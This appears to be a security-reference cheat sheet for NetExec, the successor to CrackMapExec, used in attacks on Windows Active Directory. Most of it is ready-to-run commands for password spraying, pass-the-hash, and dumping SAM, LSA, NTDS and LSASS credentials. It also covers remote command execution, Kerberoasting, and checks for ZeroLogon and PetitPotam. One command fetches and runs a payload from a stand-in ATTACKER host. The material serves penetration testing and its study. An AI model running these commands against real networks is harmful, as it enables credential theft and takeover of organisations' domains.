NetExec (nxc)

NetExec guide covering SMB, LDAP, WinRM protocols for network enumeration, credential validation, lateral movement, and Active Directory attacks.

Introduction

NetExec (nxc) is the successor to CrackMapExec, supporting SMB, LDAP, WinRM, SSH, MSSQL, and RDP protocols for Windows/Active Directory enumeration, credential validation, and lateral movement.

NetExec vs CrackMapExec

NetExec is the actively maintained fork of CrackMapExec. While commands are similar, NetExec includes bug fixes, new features, and better module support. Use nxc instead of crackmapexec for the latest capabilities.

Installation

# Using pipx (recommended)
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or with pip
pip install netexec

# Verify installation
nxc --version

Basic Usage

Protocol Syntax

nxc <protocol> <target(s)> [options]

# Examples
nxc smb 192.168.1.0/24
nxc ldap dc01.corp.local -u user -p pass
nxc winrm 10.10.10.5 -u admin -p P@ssw0rd

SMB Enumeration

Host Discovery

# Scan network for SMB hosts
nxc smb 192.168.1.0/24

# Check SMB signing (for relay attacks)
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt

# List shares
nxc smb TARGET -u USER -p PASS --shares

# Spider shares for files
nxc smb TARGET -u USER -p PASS -M spider_plus

# Download files from shares
nxc smb TARGET -u USER -p PASS -M spider_plus -o DOWNLOAD_FLAG=true

# Get specific file
nxc smb TARGET -u USER -p PASS --share SHARE --get-file path/file.txt local.txt

User Enumeration

# Logged on users
nxc smb TARGET -u USER -p PASS --loggedon-users

# Domain users
nxc smb TARGET -u USER -p PASS --users

# RID brute force (null session)
nxc smb TARGET -u '' -p '' --rid-brute

# Extended RID brute
nxc smb TARGET -u 'guest' -p '' --rid-brute 100000

Group Enumeration

# Domain groups
nxc smb TARGET -u USER -p PASS --groups

# Local groups
nxc smb TARGET -u USER -p PASS --local-groups

Password Policy

nxc smb DC_IP -u USER -p PASS --pass-pol

Credential Validation

Username/Password

# Single credential
nxc smb TARGET -u admin -p P@ssw0rd

# Local authentication
nxc smb TARGET -u admin -p P@ssw0rd --local-auth

# Null session
nxc smb TARGET -u '' -p ''

Pass-the-Hash

# Using NTLM hash
nxc smb TARGET -u admin -H 'aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd332446158b1a'

# NT hash only
nxc smb TARGET -u admin -H 'cc36cf7a8514893efccd332446158b1a'

Kerberos Authentication

# With password
nxc smb TARGET -u USER -p PASS -k

# With ticket cache
nxc smb TARGET -u USER --use-kcache

Password Spraying

# Single password against multiple users
nxc smb TARGET -u users.txt -p 'Summer2024!'

# Continue after success
nxc smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success

# Multiple passwords (no brute force - pairs users:passwords)
nxc smb TARGET -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Credential Dumping

SAM Database

nxc smb TARGET -u admin -p PASS --sam
nxc smb TARGET -u admin -H HASH --sam --local-auth

LSA Secrets

nxc smb TARGET -u admin -p PASS --lsa

NTDS.dit (Domain Controller)

# Via DRSUAPI (DCSync)
nxc smb DC -u admin -p PASS --ntds

# Via VSS
nxc smb DC -u admin -p PASS --ntds vss

# Single user
nxc smb DC -u admin -p PASS --ntds --user targetuser

LSASS Memory

# Using lsassy module
nxc smb TARGET -u admin -p PASS -M lsassy

# Using nanodump
nxc smb TARGET -u admin -p PASS -M nanodump

DPAPI Secrets

nxc smb TARGET -u admin -p PASS --dpapi

Command Execution

# Execute command
nxc smb TARGET -u admin -p PASS -x 'whoami'

# PowerShell command
nxc smb TARGET -u admin -p PASS -X 'Get-Process'

# Specify execution method
nxc smb TARGET -u admin -p PASS -x 'whoami' --exec-method smbexec
# Methods: smbexec, wmiexec, atexec, mmcexec

LDAP Operations

Enumeration

# AS-REP roastable users
nxc ldap DC -u USER -p PASS --asreproast asrep.txt

# Kerberoastable users
nxc ldap DC -u USER -p PASS --kerberoasting kerb.txt

# User descriptions
nxc ldap DC -u USER -p PASS -M get-desc-users

# GMSA passwords
nxc ldap DC -u USER -p PASS --gmsa

BloodHound Collection

nxc ldap DC -u USER -p PASS --bloodhound -ns DC_IP -c all

Vulnerability Checks

# ZeroLogon
nxc ldap DC -u '' -p '' -M zerologon

# PetitPotam
nxc ldap DC -u '' -p '' -M petitpotam

# noPac
nxc ldap DC -u USER -p PASS -M nopac

# LDAP signing
nxc ldap DC -u USER -p PASS -M ldap-checker

WinRM Access

# Check WinRM access
nxc winrm TARGET -u admin -p PASS

# Execute commands
nxc winrm TARGET -u admin -p PASS -x 'whoami'

# Spray across subnet
nxc winrm 192.168.1.0/24 -u admin -p PASS -d corp.local

Useful Modules

Information Gathering

# Web delivery (download and execute)
nxc smb TARGET -u USER -p PASS -M web_delivery -o URL=http://ATTACKER/payload

# GPP passwords
nxc smb TARGET -u USER -p PASS -M gpp_password
nxc smb TARGET -u USER -p PASS -M gpp_autologin

# ADCS enumeration
nxc ldap DC -u USER -p PASS -M adcs

# Network information
nxc ldap DC -u USER -p PASS -M get-network -o ALL=true

List All Modules

nxc smb -L
nxc ldap -L
nxc winrm -L

Output and Logging

# Export to file
nxc smb TARGET -u USER -p PASS --sam -o output.txt

# JSON output
nxc smb TARGET -u USER -p PASS --sam --export json

# Database location
~/.nxc/logs/
~/.nxc/nxc.db

Impacket - Complementary Python tools
BloodHound - Attack path analysis
SMB Attacks - SMB exploitation techniques
Active Directory - AD attack techniques

References

MITRE ATT&CK Techniques

T1110.003 - Brute Force: Password Spraying - Credential validation
T1003.002 - OS Credential Dumping: Security Account Manager - SAM dumping
T1003.003 - OS Credential Dumping: NTDS - DCSync/NTDS extraction
T1003.001 - OS Credential Dumping: LSASS Memory - lsassy module
T1021.002 - Remote Services: SMB/Windows Admin Shares - SMB execution
T1021.006 - Remote Services: Windows Remote Management - WinRM access
T1087.002 - Account Discovery: Domain Account - User enumeration
T1550.002 - Use Alternate Authentication Material: Pass the Hash - PtH attacks

Official Documentation

NetExec GitHub - Source code
NetExec Wiki - Official documentation

CrackMapExec - Original project (deprecated)

NetExec (nxc)

On this page